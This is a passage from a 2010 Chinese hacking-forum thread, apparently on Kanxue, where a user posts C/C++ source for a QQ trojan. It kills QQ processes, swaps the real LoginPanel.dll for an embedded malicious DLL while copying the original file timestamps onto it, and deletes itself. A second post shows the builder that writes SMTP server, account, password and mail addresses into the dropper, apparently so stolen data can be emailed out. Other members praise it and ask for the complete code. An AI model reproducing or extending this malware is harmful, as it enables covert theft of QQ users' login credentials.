    dwAddress=0x17E0;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,g_data5,20,&dwWrite,NULL);
 
    char szDllPath2[1000];
    strcpy(szDllPath2,szPath);
    strcat(szDllPath2,"LoginPanel.dll");
 
    HANDLE hFileTime=CreateFile(szDllPath2,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);
 
    FILETIME time;
    GetFileTime(hFileTime,NULL,NULL,&time);
    SetFileTime(hFile,&time,&time,&time);
 
    CloseHandle(hFile);
    CloseHandle(hFileTime);
}
 
 
bool InsertQQDirectory()
{
    HRSRC hRsrc=::FindResource(NULL,MAKEINTRESOURCE(IDR_DLL2),"DLL");
    HGLOBAL hGlobal=::LoadResource(NULL,hRsrc);
    LPVOID lpVoid=::LockResource(hGlobal);
    DWORD dwSize=::SizeofResource(NULL,hRsrc);
    CHAR szDriver[512]={0};
    for(int i=0;i<26;i++)
    {
        szDriver[0]='B'+i;
        szDriver[1]=':';
        szDriver[2]='\\';
        dwIsQQ=0;
        DWORD dwType=::GetDriveType(szDriver);
        if(dwType==DRIVE_NO_ROOT_DIR)
            continue;
        GetQQPath(szDriver);
        if(dwIsQQ==1)
        {  
            char szDllPath[1000];
            char szOlePath[1000];
            char szNewPath[1000];
 
            strcpy(szOlePath,szPath);
            strcat(szOlePath,"LoginPanel.dll");
            strcpy(szNewPath,szPath);
            strcat(szNewPath,"command.dll");
         
            if(GetFileType(szNewPath)!=FILE_TYPE_UNKNOWN)
                return true;
             
            CopyFile(szOlePath,szNewPath,TRUE);
            CopyFile(szOlePath,szNewPath,TRUE);
 
            strcpy(szDllPath,szPath);
            strcat(szDllPath,"LoginPanel.dll");
 
            HANDLE hFile=::CreateFile(szDllPath,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,
                NULL,CREATE_ALWAYS,0,NULL);
            DWORD dwWriteByte;
            if(hFile!=NULL)
                ::WriteFile(hFile,lpVoid,dwSize,&dwWriteByte,NULL);
 
            WriteData(hFile);
             
            return true;
        }
    }
    return false;
}
 
void CloseAllQQProcess()
{
    while (true)
    {
        HWND hwnd=FindWindow("TXGuiFoundation",NULL);
        SendMessage(hwnd,WM_CLOSE,0,0);
        PostMessage(hwnd,WM_CLOSE,0,0);
        SendMessage(hwnd,WM_DESTROY,0,0);
        PostMessage(hwnd,WM_DESTROY,0,0);
        SendMessage(hwnd,WM_CHAR,VK_RETURN,0);
        PostMessage(hwnd,WM_CHAR,VK_RETURN,0);
        Sleep(10);
        if(hwnd==NULL)
            break;
    }
}
 
void SelfDelete(void)
{
    char lpBuffer[MAX_PATH], lpFilename[MAX_PATH], lpCmdLine[MAX_PATH];
    GetEnvironmentVariable("ComSpec", lpBuffer, MAX_PATH);
    GetModuleFileName(NULL, lpFilename, MAX_PATH);
    sprintf(lpCmdLine, "%s /c del \"%s\"", lpBuffer, lpFilename);
    WinExec(lpCmdLine, SW_HIDE);
}
 
 
int WINAPI WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in_opt LPSTR lpCmdLine, __in int nShowCmd )
{
    CloseAllQQProcess();
    InsertQQDirectory();
    SelfDelete();
    return 0;
}
2010-11-1 20:47
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
18
配置器中的 主要函数代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
void CConfigureSetupDlg::WriteData()
{
    HRSRC hRsrc=::FindResource(NULL,MAKEINTRESOURCE(IDR_EXE1),"EXE");
    HGLOBAL hGlobal=::LoadResource(NULL,hRsrc);
    LPVOID lpVoid=::LockResource(hGlobal);
    DWORD dwSize=::SizeofResource(NULL,hRsrc);
 
    char szDllPath[1000];
    GetCurrentDirectory(1000,szDllPath);
    strcat(szDllPath,"\\Setup.exe");
 
    HANDLE hFile=::CreateFile(szDllPath,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL,CREATE_NEW,0,NULL);
    DWORD dwWriteByte;
    if(hFile!=NULL)
        ::WriteFile(hFile,lpVoid,dwSize,&dwWriteByte,NULL);
 
    LONG dwAddress=0;
    DWORD dwWrite;
 
    UpdateData(TRUE);
 
    char sz0[20]={0};
 
    dwAddress=0x3018;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,sz0,20,&dwWrite,NULL);
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,m_SmtpServer,m_SmtpServer.GetLength(),&dwWrite,NULL);
 
    dwAddress=0x3080;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,sz0,20,&dwWrite,NULL);
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,m_UserName,m_UserName.GetLength(),&dwWrite,NULL);
 
    dwAddress=0x30E8;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,sz0,20,&dwWrite,NULL);
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,m_Password,m_Password.GetLength(),&dwWrite,NULL);
 
    dwAddress=0x3150;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,sz0,20,&dwWrite,NULL);
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,m_SendMailAddress,m_SendMailAddress.GetLength(),&dwWrite,NULL);
 
    dwAddress=0x31B8;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,sz0,20,&dwWrite,NULL);
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,m_RecvMailAddress,m_RecvMailAddress.GetLength(),&dwWrite,NULL);
 
    CloseHandle(hFile);
}
2010-11-1 20:48
0
hackqf
雪    币: 208
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
19
也来凑个热闹,看看马是怎么炼成的
2010-11-1 20:49
0
abgood
雪    币: 32
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
20
支持楼主的开源意识!!!
2010-11-1 20:50
0
thankme
雪    币: 219
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
21
支持楼主的开源意识!!!
2010-11-1 20:59
0
Erorr
雪    币: 82
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
22
如果QQ不是安装在Program Files目录里面,是不是就没用了
2010-11-1 22:41
0
邓韬
雪    币: 278
活跃值: (709)
能力值: ( LV15,RANK:520 )
在线值:
发帖
回帖
粉丝
私信
23
绝对顶啊暗暗暗暗
2010-11-1 23:01
0
邓韬
雪    币: 278
活跃值: (709)
能力值: ( LV15,RANK:520 )
在线值:
发帖
回帖
粉丝
私信
24
楼主发个完整的吧
2010-11-1 23:06
0
kkmylove
雪    币: 338
活跃值: (103)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
私信
25
顶 啊 支持楼主发个完整的 谢了
2010-11-1 23:24
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
我已同意 《看雪服务条款》 《看雪课程免责声明》 《看雪隐私政策》